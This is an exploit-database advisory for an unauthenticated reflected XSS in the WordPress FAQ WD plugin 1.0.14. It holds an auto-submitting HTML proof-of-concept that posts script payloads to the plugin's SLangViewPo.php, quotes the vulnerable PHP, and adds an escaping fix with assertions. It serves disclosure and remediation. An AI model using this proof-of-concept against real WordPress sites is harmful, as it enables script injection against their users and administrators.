Wordpress FAQ WD plugin 1.0.14 Unauthenticated XSS Vulnerability

2016-04-17T00:00:00
ID 1337DAY-ID-25227
Type zdt
Reporter cor3sm4sh3r
Modified 2016-04-17T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            I would like to report a Unauthenticated XSS vulnerability in FAQ WD  plugin version 1.0.14 .

The Plugin can be found at https://wordpress.org/plugins/faq-wd/

This bug can be triggered by an unauthenticated or authenticated user. If a user is sent a URL by social engineering and clicks the link, the bug is triggered.

The URL should be something like this

http://attackerssite.com/XSS_POC.html



The code for XSS_POC.html is as follows:


<html>
  <body onload="document.forms['xss'].submit()" >
    <form name="xss" action="http://targetsite/wpinstallation/wp-content/plugins/faq-wd/lang/views/SLangViewPo.php" method="POST" >
      <input type="hidden" name="lang_err_mess" value="<script>alert(1);</script>" />
      <input type="hidden" name="lang_success_synchron" value="<script>alert(2);</script>" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


Technical Details:

The vulnerable page is

wp-content/plugins/faq-wd/lang/views/SLangViewPo.php

This page can be directly accessed by anyone.

The code responsible for the vulnerability:
<?php if (isset($_POST['lang_err_mess'])): ?>
    <div class="error" style="display: inline-block;width: 100%"><p><?php echo $_POST['lang_err_mess']; ?></p></div>
<?php elseif (isset($_POST['lang_success'])): ?>
    <div class="updated" style="display: inline-block;width: 100%"><p><?php echo 'File was successfully updated.'; ?></p></div>
<?php endif; ?>
<?php if (isset($_POST['lang_success_synchron'])): ?>
    <div class="updated" style="display: inline-block;width: 100%"><p><?php echo $_POST['lang_success_synchron']; ?></p></div>
<?php endif; ?>


Here we can see that two POST parameters are echoed into the page without any escaping while it is rendered, so a request body containing markup is reflected back as live HTML.

The vulnerable POST parameters are:

    $_POST['lang_err_mess']
    $_POST['lang_success_synchron']
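As an added example that is not part of the advisory or the plugin's code, the same two notices rendered with the request values escaped. htmlspecialchars() stands in for WordPress's esc_html() so the snippet runs from the CLI without WordPress loaded; render_lang_notices is a hypothetical name, and the input array is constructed from the PoC form above.

```php
<?php
// Added example, not the plugin's code. The WordPress-specific hardening that
// belongs at the top of a view file is shown as comments so this runs stand-alone:
//   if ( ! defined( 'ABSPATH' ) ) { exit; }            // block direct access to the file
//   if ( ! current_user_can( 'manage_options' ) ) { exit; } // admin-only view

/**
 * Build the notice markup for a request body. Every value that originates in
 * the request is HTML-escaped before it is placed inside the <p> element, so
 * "<script>" reaches the browser as the text "&lt;script&gt;".
 */
function render_lang_notices(array $post): string
{
    $esc = static function (string $s): string {
        // esc_html() in WordPress; htmlspecialchars() is the plain-PHP equivalent.
        return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    };

    $out = '';
    if (isset($post['lang_err_mess'])) {
        $out .= '<div class="error"><p>' . $esc((string) $post['lang_err_mess']) . '</p></div>';
    } elseif (isset($post['lang_success'])) {
        // Fixed string: nothing request-controlled is echoed on this branch.
        $out .= '<div class="updated"><p>File was successfully updated.</p></div>';
    }
    if (isset($post['lang_success_synchron'])) {
        $out .= '<div class="updated"><p>' . $esc((string) $post['lang_success_synchron']) . '</p></div>';
    }
    return $out;
}

// Constructed input mirroring the two hidden fields in the PoC form.
$poc = [
    'lang_err_mess'         => '<script>alert(1);</script>',
    'lang_success_synchron' => '<script>alert(2);</script>',
];

$html = render_lang_notices($poc);

// The payload survives only as inert text; no <script> element is emitted.
assert(strpos($html, '<script>') === false);
assert(strpos($html, '&lt;script&gt;alert(1);&lt;/script&gt;') !== false);
assert(strpos($html, '&lt;script&gt;alert(2);&lt;/script&gt;') !== false);

echo $html, PHP_EOL;
```

Escaping fixes the reflection, but the deeper fix is to stop taking notice text from the request at all and map a server-side status to fixed strings; the file also should not be reachable outside WordPress in the first place.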

#  0day.today [2016-04-20]  #